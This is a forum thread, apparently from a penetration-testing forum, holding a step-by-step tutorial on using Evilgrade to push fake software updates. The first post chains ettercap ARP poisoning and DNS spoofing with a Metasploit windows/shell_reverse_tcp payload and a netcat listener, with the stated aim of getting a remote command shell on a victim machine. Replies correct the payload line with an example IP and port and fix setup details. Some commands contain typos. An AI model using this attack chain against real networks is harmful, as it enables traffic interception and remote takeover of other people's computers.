Results 1 to 10 of 13

Thread: How To: Evilgrade

Hybrid View

  1. #1
    Junior Member
    Join Date
    Jun 2006
    Posts
    63

    Default How To: Evilgrade

    Today ill explain how to use Evilgrade. Evilgrade is a modular framework that allows an attacker to take advantage of poorly implemented software upgrades. An attacker can use Evilgrade in combination with DNS spoofing or a MITM attack to spoof a software update and trick the victim computer into executing arbitrary code such as a Metasploit’s Payload. Currently, the Evilgrade framework supports the following software: Java plugin, Winzip, Winamp, MacOS, OpenOffices, iTunes, Linkedin Toolbar, Download Accelerator, notepad++, and speedbit. In this tut, i illustrate how to use Evilgrade with a DNS Spoofing attack to execute a reverse shell on a target computer.

    My target will be my Winblows XP machine using Notepad++ on my own network.

    First you will need to download Evilgrade from:
    Code:
    www.infobyte.com.ar
    Once you have downloaded the file you need to decompress it:
    Code:
    BT ~ / tar zxvf lsr-evilgrade-1.0.0.tar.gz
    Ok so navigate to the folder by:
    Code:
    BT ~ / cd lsr-evilgrade
    Now to start Evilgrade you type:
    Code:
    ./evilgrade
    Now that your in Evilgrade you can have look at the modules you would look to spoof. You can do that by typing:
    Code:
    show modules
    As you can see there are a few you can spoof, but today ill be using Notepad++.

    Ok so you have picked your weapon.. err module? We now have to config that module. You can do this by typing:
    Code:
    config notepadplus
    NOTE: If your not using Notepad++ put the name of the module you would like to configure.

    So now to see all the options for that module you type:
    Code:
    show options
    At this point you can see all the options of that module. You can see the virtual host and the agent to inject.

    Ok so now we have gotten this far. Have i lost you? Good. The next step is choosing what payload to use with the agent.
    You will have to open up a new shell and navigate to the Metasploit directory to see what we can use. You can do that by following the commands below:
    Code:
    BT ~ / cd /pentest/exploits/framework3
    BT ~ / ./msfpayload
    Now find what payload you wish to use and remember where it is located.
    I will be using windows/shell_reverse_tcp
    So now we go back the the Evilgrade shell and set the agent. To set the agent follow the commands below:
    Code:
    set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=ip LHOST=port X > <%OUT%>/tmp/a.exe<%OUT%>"]'
    NOTE:LHOST is your IP and LPORT is the port you want it to connect to.
    What that does is when the victim uses the update it will connect back to you.

    So now the payload and update is all set. The next thing we want to do is DNS spoofing. In order to complete this you need some background knowledge to DNS spoofing.
    So now we have to edit the etter.dns file. You can do that by follow these commands:
    Code:
    BT ~ / cd /usr/local/share/ettercap
    BT ~ / nanoetter.dns
    Delete all the junk in the file that wont be being used. It should look like this after you are done.
    NOTE: Remember im useing the Nopepad++ module, this will be different if your using another module.
    Code:
      GNU nano 2.0.6                         File: etter.dns                                                Modified
    
    #                                                                          #
    # or for WINS query:                                                       #
    #    workgroup WINS 127.0.0.1                                              #
    #    PC*       WINS 127.0.0.1                                              #
    #                                                                          #
    # NOTE: the wildcarded hosts can't be used to poison the PTR requests      #
    #       so if you want to reverse poison you have to specify a plain       #
    #       host. (look at the www.microsoft.com example)                      #
    #                                                                          #
    ############################################################################
    
    ################################
     notepadplus.sourceforge.net A yourIP
    Now were going to want to start Ettercap. While still in the shell you edited the etter.dns in, type the follow:
    Code:
    ettercap -G
    Now that were in Ettercap we need to:
    Sniff (eth0)
    Scan for hosts
    Set the targets: Default gateway + target pc
    Use a MITM attack, ARP poisioning
    Go to Plugins and use dns_spoof
    Start sniffing

    So now open another shell so we can listen in on the port that the module will open once the victim has download the "update"
    To listen on the port type the following:
    Code:
    nc -l -v -p port
    NOTE:The port number has to be the port number you set up with the module.

    Now go back to Evilgrade and type the following:
    Code:
    start
    Now you have to wait for the victim to accept the update when they open up the program that your module is for. Once they update the program you will see in the shell that you typed the commands in to listen for that port you will then be into their CMD.

    I hope this has been a help in anyway, if you have any subjections to what i should add or change, please do hesitate to send me a pm about it.

    Thanks, Jesse.
    Jesse -- NOM NOM NOM ^.^

  2. #2
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318
    Don't eat yellow snow :rolleyes:

  3. #3
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    http://vimeo.com/1575771
    this video is really good

  4. #4
    Junior Member ktzqbp's Avatar
    Join Date
    Nov 2008
    Posts
    25

    Default

    Thanks for this, antichrist. I'll give it a shot sometime this weekend.

  5. #5

    Default

    Good guide! Well done!

    Just one little problem with it:
    set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=ip LHOST=port X > <%OUT%>/tmp/a.exe<%OUT%>"]'
    There is two LHOST, the last one needs to be LPORT (to match up with port )
    example:
    Code:
    set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=4444 X > <%OUT%>/tmp/a.exe<%OUT%>"]'
    Else it works well!
    Now a new toy for me to play with (=
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

  6. #6
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Nice tutorial, antichrist. Couple of things in addition to g0tmi1k -

    tar zxvf lsr-evilgrade-1.0.0.tar.gz
    cd lsr-evilgrade
    The "l" is actually "i"-
    tar zxvf isr-evilgrade-1.0.0.tar.gz
    cd isr-evilgrade

    AND, 2nd point is - although it works fine with BT3, it's not with BT4. Has anybody tried evilgrade with BT4?
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  7. #7
    Junior Member Isohump's Avatar
    Join Date
    Sep 2009
    Posts
    63

    Default

    Thank you so much adkfjsklfjj you saved me some time..
    One day your life will flash before your eyes. Make sure its worth watching.

  8. #8
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    3

    Default thanks

    I second the thanks for the PERL tip in BT4.

  9. #9
    Good friend of the forums spawn's Avatar
    Join Date
    Jan 2010
    Posts
    280

    Default

    I see the apresentation in last year old of the Francisco Amato
    demonstrating the framework in H2HC
    really fantastic .

    i would like to ask if somebody know if exists some module to windows update

    Thanks
    "If you aim the gun at your foot and pull the trigger, it's
    UNIX's job to ensure reliable delivery of the bullet to
    where you aimed the gun (in this case, Mr. Foot)."

  10. #10
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    i have played with evilgrade a long time ago, i have a few questions... im going to look threw the source and hopefully ill answer them myself...

    could this be done in the style of autopwn? how hard would it be to add more modules...

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •